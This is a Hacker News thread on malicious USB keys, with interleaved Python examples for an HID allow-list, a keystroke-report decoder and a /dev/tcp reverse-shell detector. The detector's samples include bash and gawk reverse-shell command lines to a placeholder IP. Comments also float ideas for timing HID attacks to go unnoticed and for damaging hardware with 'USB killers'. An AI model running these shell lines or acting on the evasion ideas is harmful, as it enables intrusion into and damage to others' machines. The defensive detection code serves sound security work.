
What are malicious USB keys and how to create a realistic one? - liotier
https://www.elie.net/blog/security/what-are-malicious-usb-keys-and-how-to-create-a-realistic-one
======
s_kilk
A few years ago, a co-worker came back from a MongoDB event with a bag of
swag, including a MongoDB branded USB drive.

When he plugged it in, it acted as a keyboard and managed to open the browser
to a MongoDB promotional page.

Needless to say he freaked out a bit. Some marketing goons (not restricted to
the people at MongoDB) seem to think this kind of thing is a great promotional
tool.

Now that I think of it, my wife has a similar story about her University
distributing this same kind of USB/botnet thing to students.

~~~
ubernostrum
Who needs USB keys?

If you have Python (and preferably a handy virtualenv so you can throw it away
afterward), do `pip install rickroll`.

It will do exactly what it sounds like it should do.

------
stcredzero
_A HID-based attack has to spawn a terminal and very quickly inject a set of
commands that is very visible but only for a short period of time. Once the
attack has been carried out, there is nothing left to see, so this type of
attack is less obvious than the social engineering one._

MEMS microphones are tiny. It should be possible to combine data from that and
a light sensor, that would make an HID based attack far less likely to be
detected. The frequency profiles of keystrokes and someone pushing away an
office chair should be fairly easy to discern. You'd want to make it more
likely that the attack would occur after someone had left their desk.
(Hopefully with the machine unlocked.)

EDIT: Another idea: The USB key uses autorun to pop up what looks like a
spammy ad for a PC "cleaner" utility, or something you'd expect on a USB key
conference swag item. Its actual purpose is to cover up the shell's window,
or to contain the exploit itself.

~~~
ben174
I think it would be unlikely that the user would step away from his machine
before unplugging the device. If it was discovered on the ground, I would
think the likely sequence of events is: 1.) plug in, 2.) open finder, notice
nothing of interest. 3.) unplug, 4.) discard

~~~
stcredzero
So then, one tactic would be to fill it with nested folder after folder of
something that might be interesting. Like "Studio Rough.mp3" If you make it
large enough, a lot of people will procrastinate going through it all.

------
jotux
Making a mold and casting a custom case seems incredibly cumbersome compared
to just buying a USB key case and fitting the board into it:
[http://www.mouser.com/New-Age-Enclosures/Enclosures/Enclosur...](http://www.mouser.com/New-Age-Enclosures/Enclosures/Enclosures-Boxes-Cases/_/N-5g3p?P=1z0s1a1Z1z0vnv0)

~~~
throwaway2016a
If you look closely there might be two issues with that. First the device that
was used doesn't have the USB connector centered and second, the board sticks
out the edge a little so I would guess that it would need a larger than normal
case.

~~~
ajford
I think the parent might have been suggesting to develop your own board. Using
something like a USB enabled Atmel chip (ATMega32u2) should be relatively
simple, and there are plenty of HID libraries out there for it. If you were
trying for a bulk attack, or had the funds, this would be by far the best
solution.

~~~
Sanddancer
Even a non-bulk attack can be done pretty cheaply these days. Places like
seeed will do boards for a buck a piece if your design's small enough and you
get a ten pack. Doing smt work is honestly more bark than bite compared to
pth; a $20 toaster oven will work Well Enough for something like this.

~~~
jotux
For small run electronic prototyping it's hardly worth stuffing your own
boards any more. Macrofab or circuithub can get you fully assembled boards in
a few weeks in the $20-$50/unit range.

------
achr2
A really sneaky method would be to create a USB suppository, that looked like
a large USB key but would leave the active part inserted inside the socket
after the target pulls out the seemingly defective key.

~~~
mablap
And how is the port supposed to stay functional upon removal of the key? The
point of this attack is stealth.

------
mschuster91
There's a fourth class of malicious USB keys: those which discharge -100V
across the USB data lines, aka "usb killers". Drop a couple of these on a huge
parking lot to create a boatload of damage.

~~~
lightedman
Most ICs can handle at least -3000V static discharge. You need to pump about
-5000V to start doing real damage. Even LEDs are so robust nowadays as to take
3X-5X their rated forward voltage as reverse voltage regardless of what their
spec sheet says; I make 120V rectifiers from strings of them all the time.

~~~
yuubi
The 3 kV rating is most likely 3 kV on a human body model, which is a small
capacitor (few picofarads) with a series resistor. This says nothing about
what happens if you charge a large capacitor to 100v and then dump it through
as low a resistance as possible into the victim port.

------
Sanddancer
A zero-day key wouldn't have hardware costs that would be significantly
different from an HID key. A lot of microcontrollers will gladly announce
themselves to be whatever sort of device class you want them to be, and which
vendor and device IDs to use. Also, if you're worried about bulk, putting an
LED or something that flashes and looks pretty would also lower peoples'
guards as to why it's so big. USB hacking is an area where there are wide open
fields to play with.

------
rwmj
If one finds a USB key in a parking lot, is there any safe way to find out
what's on it?

~~~
jpindar
Plug it in a Raspberry Pi that's not connected to a network. After you're
done, destroy the Pi's SD card.

~~~
sean2
Put the SD card in Read only mode. Save yourself $10.

~~~
marcosdumay
Not enough by a far margin.

There's a computer inside that SSD that reads a soft signal to decide if
writing is enabled or not. More often than not its firmware is full of known
bugs.

~~~
colejohnson66
Correct me if I'm wrong, but that's because SD cards are half duplex, right?
So there's no way to disable writing through a "disconnect pins x and y"
because those pins are needed for reading.

~~~
paulannesley
SD cards implement a simple four-pin mode (SPI) for which there's public
documentation, and a proprietary mode parallelizing data over more pins. I
know more about the former than the latter, but it's probably a similar
situation.

SPI is full duplex; it has a dedicated line per data direction (MISO and
MOSI), however the same lines are used for commands and data. So with MOSI
(master out, slave in) physically disconnected, it'd be impossible to send the
command asking to read data, even though that data would be delivered on the
separate MISO (master in, slave out) line.

------
greggman
This might be a dumb question but wouldn't one solution to the HID-based
attack be for the OS to ask the user for permission to allow the new keyboard?
As in "New Keyboard Detected: Allow? Y/N" That wouldn't protect against driver
0 days but hey, one step at a time.

Do any OSes have an option to ask the user if connection is ok before allowing
it?

~~~
Benjammer
What if it's the first HID you connect? How do you confirm?

~~~
liotier
Whitelist if present at logon and confirm if inserted later?

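The "whitelist what was present at logon, confirm anything inserted later" policy from the exchange above, as an added example for this thread (not an implementation shipped by any OS). It models USB interfaces as plain records of the kind you could read from `/sys/bus/usb/devices/*/bInterfaceClass` on Linux; the device lists, VID:PID values and serials below are constructed placeholders, and `ask_user` stands in for whatever prompt the desktop would show.

```python
"""Gate newly inserted HID (keyboard/mouse) interfaces behind a logon-time allow-list.

Added example for this discussion, not code from the linked post or any OS.
Device records below are constructed; VID:PID values are placeholders.
"""
from dataclasses import dataclass

USB_CLASS_HID = 0x03          # bInterfaceClass used by keyboards, mice and HID-based USB keys
USB_CLASS_MASS_STORAGE = 0x08
HID_PROTOCOL_KEYBOARD = 0x01  # bInterfaceProtocol for a boot-protocol keyboard


@dataclass(frozen=True)
class UsbInterface:
    vid: int
    pid: int
    serial: str            # "" when the device reports no serial number
    iface_class: int
    iface_protocol: int

    def identity(self):
        # A device without a serial cannot be told apart from a clone that
        # presents the same VID:PID, so an allow-list entry for it is weaker:
        # a malicious key spoofing your keyboard's VID:PID would pass silently.
        return (self.vid, self.pid, self.serial)


class HidGate:
    """Authorize HID interfaces seen at logon; ask before accepting any other."""

    def __init__(self, present_at_logon):
        self.allowed = {d.identity() for d in present_at_logon
                        if d.iface_class == USB_CLASS_HID}
        self.blocked = []

    def on_hotplug(self, dev, ask_user):
        """Return 'authorized' or 'blocked' for one newly added interface.

        Non-HID interfaces (mass storage, etc.) are outside this gate's scope
        and pass; this is why a composite 'storage + keyboard' key still shows
        up as a drive while its keyboard half is held back.
        """
        if dev.iface_class != USB_CLASS_HID:
            return "authorized"
        if dev.identity() in self.allowed:
            return "authorized"
        if ask_user(dev):
            self.allowed.add(dev.identity())
            return "authorized"
        self.blocked.append(dev)
        return "blocked"


# Constructed logon-time inventory: one keyboard and one ordinary flash drive.
LOGON_DEVICES = [
    UsbInterface(0x1111, 0x0001, "KB-0001", USB_CLASS_HID, HID_PROTOCOL_KEYBOARD),
    UsbInterface(0x2222, 0x0002, "STICK-42", USB_CLASS_MASS_STORAGE, 0x50),
]

# Constructed "found in the parking lot" key: a composite device exposing a
# storage interface and a keyboard interface behind the same VID:PID.
FOUND_KEY_STORAGE = UsbInterface(0x3333, 0x0003, "", USB_CLASS_MASS_STORAGE, 0x50)
FOUND_KEY_KEYBOARD = UsbInterface(0x3333, 0x0003, "", USB_CLASS_HID, HID_PROTOCOL_KEYBOARD)


def demo(user_says_yes=False):
    """Walk the three interesting cases; returns the gate's decisions in order."""
    gate = HidGate(LOGON_DEVICES)
    answer = lambda dev: user_says_yes
    return [
        gate.on_hotplug(FOUND_KEY_STORAGE, answer),    # storage half: passes
        gate.on_hotplug(FOUND_KEY_KEYBOARD, answer),   # keyboard half: needs consent
        gate.on_hotplug(LOGON_DEVICES[0], answer),     # re-plugged logon keyboard: passes
    ]


if __name__ == "__main__":
    print(demo(user_says_yes=False))
    print(demo(user_says_yes=True))
```

The allow-list keyed on (VID, PID, serial) is only as strong as the serial: a key that clones the VID:PID of a serial-less keyboard already on the list is accepted without a prompt, which is the gap Benjammer's question points at.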
------
shawkinaw
Another good reason to run something like Little Snitch. Of course it's also
another good reason not to plug random USB keys into your computer.

It also seems to me like your OS should warn and confirm when a new input
source is detected.

------
Palomides
It's interesting to see mention of 0-days against USB drivers as a vector,
says "AFAIK, none of those have been publicly discussed." It seems very likely
there are vulnerable drivers.

~~~
blockoperation
Block layer or filesystem driver vulnerabilities would be even better – no
special hardware needed. Just buy a load of cheap flash drives, copy over your
malicious partition table or filesystem, and you're set.

~~~
Palomides
That seems a little optimistic, I figure there must be some moderately obscure
device drivers that get much less scrutiny.

~~~
Kalium
I suspect a lot of machines still have old floppy disk drivers...

------
DeepYogurt
Relevant to this discussion: [https://www.crowdsupply.com/inverse-path/usb-armory](https://www.crowdsupply.com/inverse-path/usb-armory)

------
PokeAcer
I'm surprised nobody has made something for testing; how much would it take to
make something you plug a USB into and see what it does?

(I.E. "USB is typing"/"USB is doing")

~~~
thatcat
There is usbpcap which captures all the packets.

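The "USB is typing" check asked for above, as an added example for this thread (not code from the linked post or from USBPcap): once you have the raw interrupt-IN reports of a suspicious key from a USBPcap/Wireshark capture, decoding them shows exactly what it typed. The decoder below handles the 8-byte boot-protocol keyboard report (modifier bitmap, reserved byte, six key usage IDs) with a US-layout subset of the HID usage table; the report sequence at the bottom is constructed by hand and mimics the "GUI+r, type a command, Enter" pattern.

```python
"""Decode USB HID boot-protocol keyboard reports into the text a device typed.

Added example for this discussion, not code from the linked post. Input is a
sequence of raw 8-byte keyboard reports (e.g. pulled out of a USBPcap
capture); the SAMPLE reports below are constructed by hand.
"""

# Modifier bitmap (report byte 0); only the bits this demo interprets.
MOD_LSHIFT, MOD_RSHIFT = 0x02, 0x20
MOD_LGUI, MOD_RGUI = 0x08, 0x80       # Windows / Command key

# Usage ID (HID usage page 0x07) -> (unshifted, shifted), US layout subset.
_USAGE = {}
for i, ch in enumerate("abcdefghijklmnopqrstuvwxyz"):
    _USAGE[0x04 + i] = (ch, ch.upper())
for i, (plain, shifted) in enumerate(zip("1234567890", "!@#$%^&*()")):
    _USAGE[0x1E + i] = (plain, shifted)
_USAGE.update({
    0x28: ("\n", "\n"),   # Enter
    0x2C: (" ", " "),     # Space
    0x2D: ("-", "_"), 0x2E: ("=", "+"), 0x2F: ("[", "{"), 0x30: ("]", "}"),
    0x31: ("\\", "|"), 0x33: (";", ":"), 0x34: ("'", '"'),
    0x36: (",", "<"), 0x37: (".", ">"), 0x38: ("/", "?"),
})


def decode_reports(reports):
    """Return (typed_text, events) for a sequence of 8-byte boot keyboard reports.

    A key is taken as pressed on the first report in which its usage ID
    appears and is not repeated while held (the reports repeat it every
    poll). GUI-key chords are returned separately in `events`, because a
    plain keystroke log would hide "GUI+r"-style launcher shortcuts.
    """
    text, events, held = [], [], set()
    for rep in reports:
        if len(rep) != 8:
            raise ValueError("boot keyboard reports are exactly 8 bytes")
        mods = rep[0]
        shifted = bool(mods & (MOD_LSHIFT | MOD_RSHIFT))
        gui = bool(mods & (MOD_LGUI | MOD_RGUI))
        now = {u for u in rep[2:8] if u}         # 0x00 = empty slot
        for usage in sorted(now - held):         # newly pressed keys only
            chars = _USAGE.get(usage)
            if gui:
                events.append("GUI+" + (chars[0] if chars else "0x%02x" % usage))
            elif chars:
                text.append(chars[1] if shifted else chars[0])
            else:
                events.append("unknown usage 0x%02x" % usage)
        held = now
    return "".join(text), events


def press(usage, mods=0):
    """Build a press report followed by the all-released report a real key sends."""
    return [bytes([mods, 0, usage, 0, 0, 0, 0, 0]), bytes(8)]


# Constructed sample: GUI+r, then "cmd", then Enter.
SAMPLE = []
SAMPLE += press(0x15, MOD_LGUI)                     # 0x15 is 'r'
for ch in "cmd":
    SAMPLE += press(0x04 + ord(ch) - ord("a"))
SAMPLE += press(0x28)                               # Enter

if __name__ == "__main__":
    typed, chords = decode_reports(SAMPLE)
    print(repr(typed), chords)                      # 'cmd\n' ['GUI+r']
```

Feeding the decoder from a real capture means extracting the 8-byte payloads of interrupt-IN transfers on the keyboard's endpoint; the decoder deliberately does not parse the capture format itself, so it can be pointed at reports from any source.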
------
cheiVia0
He forgot the electrical attacks; fry your motherboard with a malicious USB
device.

~~~
Philipp__
I think that was not the point of this, let's call it "experiment". Although I
saw on Hackaday some "USB devices" that held huge capacitors in them, so when
you plug it in, caps would discharge and your motherboard would be damaged.

------
gwu78
"(I didn't know about it!)"

The reference is to the existence of /dev/tcp when using the "Bourne again"
shell. Some other large shells, and gawk, have this "feature" as well.

Then I noticed he is head of something technical at Google.

We are always reading about the rigor of this company's interviews in testing
candidates for practical knowledge.

I guess knowledge of important capabilities of widely/universally installed
software is not something they are testing for?

I mean, I am sure there are probably hundreds of employees there who know
these things. And they have some legendary programmers on the payroll. It is
like a miniature Hall of Fame of computer programming.

I am not even sure what this all means, but I find it interesting to see the
gaps in knowledge considering jobs with this company are so highly sought
after.

And they are entrusted with protecting an enormous quantity of other people's
data.

~~~
jerf
I just checked. The only presence of this feature in the Bash man page is
under REDIRECTION with the following, as the fifth and sixth elements of the
list:

         /dev/tcp/host/port
           If host is a valid hostname or Internet address, and port is an integer
           port number or service name, bash attempts to open the corresponding
           TCP socket.
         /dev/udp/host/port
           If host is a valid hostname or Internet address, and port is an integer
           port number or service name, bash attempts to open the corresponding
           UDP socket.

It's not a feature with a large documentation footprint. I've known about it
for a while, but mostly only in the context of security too. I have wondered
whether the majority use of this feature is to provide hacked network shells
before. It's probably a feature that never should have been added, though I
understand the initial appeal.

~~~
duskwuff
It's a terrible "feature". Not only is it poorly documented (as noted) and
redundant to common shell utilities (like nc), it's also implemented in a way
that confusingly implies that it's part of the operating system. (And if your
OS ever implemented a "real" /dev/tcp, I suspect that this Bash feature would
make it inaccessible.)

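Since the comments above note that the main use of bash's `/dev/tcp` and `/dev/udp` pseudo-files (and gawk's `/inet/` equivalents) in practice is hacked-together network shells, here is the detection side as an added example for this thread (not code from the linked post): a scanner over command lines, such as those you would pull from shell history or process-execution logs, that extracts the host and port from each pseudo-file reference and rates the interactive-shell-plus-redirection shape higher. The command lines below are constructed.

```python
"""Flag command lines that open sockets through bash's /dev/tcp, /dev/udp or gawk's /inet/ pseudo-files.

Added example for this discussion, not code from the linked post. Patterns
follow the documented forms /dev/tcp/host/port and /dev/udp/host/port
(bash) and /inet/tcp/lport/rhost/rport (gawk). Sample lines are constructed.
"""
import re

BASH_NET = re.compile(r"/dev/(tcp|udp)/([A-Za-z0-9.\-]+)/([A-Za-z0-9\-]+)")
GAWK_NET = re.compile(r"/inet/(tcp|udp)/(\d+)/([A-Za-z0-9.\-]+)/([A-Za-z0-9\-]+)")
# Interactive shell pointed at the socket, or stdin redirected back from it:
# the classic reverse-shell shape, worth a higher severity than a bare connect.
REVERSE_SHELL = re.compile(r"\b(ba)?sh\s+-i\b.*/dev/(tcp|udp)/|/dev/(tcp|udp)/\S+\s+0[<>]&1")


def find_net_pseudofiles(cmdline):
    """Return a list of (tool, proto, host, port, severity) hits for one command line."""
    hits = []
    for m in BASH_NET.finditer(cmdline):
        severity = "high" if REVERSE_SHELL.search(cmdline) else "medium"
        hits.append(("bash", m.group(1), m.group(2), m.group(3), severity))
    for m in GAWK_NET.finditer(cmdline):
        # group(2) is the local port, which is 0 for an outbound client connection
        hits.append(("gawk", m.group(1), m.group(3), m.group(4), "medium"))
    return hits


def scan(lines):
    """Map each flagged command line to its hits; benign lines are dropped."""
    findings = {}
    for line in lines:
        hits = find_net_pseudofiles(line)
        if hits:
            findings[line] = hits
    return findings


# Constructed sample command lines (as might be read from bash history or an exec log).
SAMPLE_LINES = [
    "bash -i >& /dev/tcp/10.0.0.5/4444 0>&1",
    "exec 3<>/dev/tcp/example.com/80; printf 'GET / HTTP/1.0\\r\\n\\r\\n' >&3",
    "gawk 'BEGIN { s = \"/inet/tcp/0/10.0.0.5/4444\"; while ((s |& getline c) > 0) system(c) }'",
    "echo hello > /dev/null",
    "cat /proc/net/tcp",
]

if __name__ == "__main__":
    for line, hits in scan(SAMPLE_LINES).items():
        print(line)
        for tool, proto, host, port, severity in hits:
            print("   %s %s -> %s:%s [%s]" % (tool, proto, host, port, severity))
```

The `/dev/tcp` path never exists on disk, so a file-integrity or `lsof` view will not show it; the only places it appears are the shell's own command text and the resulting socket, which is why command-line logging is the natural place to catch it.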
